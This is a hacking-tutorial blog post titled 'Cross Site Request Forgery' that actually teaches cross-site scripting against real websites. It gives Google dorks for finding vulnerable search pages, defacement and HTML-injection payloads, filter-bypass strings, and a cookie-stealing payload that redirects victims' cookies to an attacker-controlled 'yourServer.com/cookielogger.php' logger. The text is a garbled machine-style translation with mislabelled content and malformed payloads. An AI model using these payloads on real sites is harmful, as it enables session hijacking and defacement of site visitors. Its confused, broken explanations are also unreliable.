Cross Site Request Forgery

Cross Site Request Forgery

Cross Site Request Forgery

After a long time I came up with a tutorial of hacking. Now the name of the hacking will be shown as XSS or Cross Site Scripting. In this tutorial, I hope you will try to teach on this method altogether. KaliLinuxExpert said the hacking class will arrange the class. But TJ mint leaves have not started yet due to lack of time. So sometimes you write something for hacking. Let’s go to the original post. Cross Site Request Forgery.

In This tutorial What You Will Learn?

What is XSS?

How to Find XSS Vulnerabilities?

XSS Initial Discussion

Victim is the method of death

How to steal a cookie

Bypassing Filtration

What is XSS?

What is XSS to know before working on it? XSS is a short word, its full description is Cross Site Scripting. This is one of the most popular methods of application-layer web attacks. Usually this method is used to hack various large sites. This is the best way to break the security of a website. Cross Site Request Forgery.

A hacker with XSS attack infected the original webpage of its victim’s client side script. When a visitor visits your website, the script is automatically downloaded to the visitor’s browser. See the image below …

With a XSS attact, a hacker website may set malicous code. Now we will start the main tutorial. Let’s find out first XSS vulnerabilities. Cross Site Request Forgery.

Find out XSS Vulnerabilities

You can take the help of blogs, forums, shoutboxes, comment boxes, search boxs, and anything else to find out the vulnerabilities of a website. You can also take out the value of the website with Google Dorks. If you can not crack, go to Google and enter the following doc and enter it. Cross Site Request Forgery

inurl: “search.php? q =”

Then you will get many results.

XSS Initial Discussion

To know the basic things of XSS, first to see a picture. See the image below …

The most commonly used code in Xss injection is that

<script> alert (“XSS”) </ script>

If you have been victimized by the victim’s site then a pop-up menu will appear after giving this code. If the job is done, you can add more. See …

<script> alert (“kalilinuxexpert.us Hacked by TJ Unselected”) </ script>

Anyway, I told you first that if you can not do cracking to use Google Dock. So we’ll use the below dock to find out the value. Cross Site Request Forgery

search.php? q =

If you find a site valued, enter the code below. Well, you’ve got www.site.com’s vulnerable. Then type

www.site.com/search.php?q=<script>alert(“TunerPage.Com Hacked by TJ Unselected”)</script>

Then there will be a pop-up menu like the following.

It always works but sometimes it does not want to work. Then do not sneeze and show another path: P You can try to give injecting HTMl. ­čśë Then enter the HTML code below.

<h1> anything you want </ h1> <br> <br> <b> <u> any thing you want </ u> </ b>

Then my link will be

www.site.com/search.php?q= <h1> TunerPage.Com Hacked by TJ Unselected </ h1>

www.site.com/search.php?q= <br> <br> <b> <u> TunerPage.Com Hacked by TJ Unselected </ u> </ b>

In this case, if you see Bold here, then it will be valuelable.

Victim is the method of death

Hope you’ve got a rough idea about how XSS works now. Now I will show some popular methods on this. Hope you can also

<html> <body> <IMG SRC = “http://site.com/TJUnselected.png”> </ body> </ html>

You can also do another job with IMG SCR for those who do not know those HTML for them. IMG SCR is a tag, the image shown here will be displayed on the link webpage. Now we have found a Shoutbox, Comment box or anything. Which will show your submitted data in the webpage. However, this will show only the photo link in your webpage. Cross Site Request Forgery

<IMG SRC = “” http://site.com/TJUnselected.png “>

However, if you do this, your image will look bigger on the webpage. Another method is the FLASH video.

<EMBED SRC = “http://site.com/TJUnselected.swf”

Now give a pop-up

<script> window.open (“http://www.tunerpage.com”) </ script>

How to steal a cookie

It’s a good thing in XSS. First you have to take a cookie sealer. Go here for this. Save it now. You can find a .php file. Upload it to a web server. And remember, create a file named ‘log.txt’ and chmod it at 777. I will explain chmod better in another post. Let’s do it without doing it. But keep in mind that chmod is a Unix command that gives you access to a system. Find out an XSS vulnerable website. If you have found you will enter your code now. Cross Site Request Forgery

window.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie

Or

document.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie

Now whenever the visitor visits your site, it will keep their cookies stolen. Now we’ll get a cookie.

http://site.com/search.php?q=document.location = “http://yourServer.com/cookielogger.php?c=”+document.cookie

Filteration Bypassing

You will find many sites that are vulnerable but the code does not work there. What to do? That’s why this part is for this. See some of the bypass filteration methods

‘) alert (‘ xss’);

Or

“); alert (‘xss’);

With any one code above you can get anything from a vulnerable server. But before you submit your data, you can do encoding to hexing or base64. There are a few other ways to bypass filteration.

<script type = text / javascript> alert (“saurav”) </ script>

<script> alert (“saurav”) </ script>;

<script> alert (“saurav”); </ script>

<script> alert (“/ saurav” /) </ script>

Happy Hacking

Hope you do not abuse hacking. Keep this in mind that you are not victim of hacking.

Hacking With Google Part 1

Hacking With Google Part 2

Leave a comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.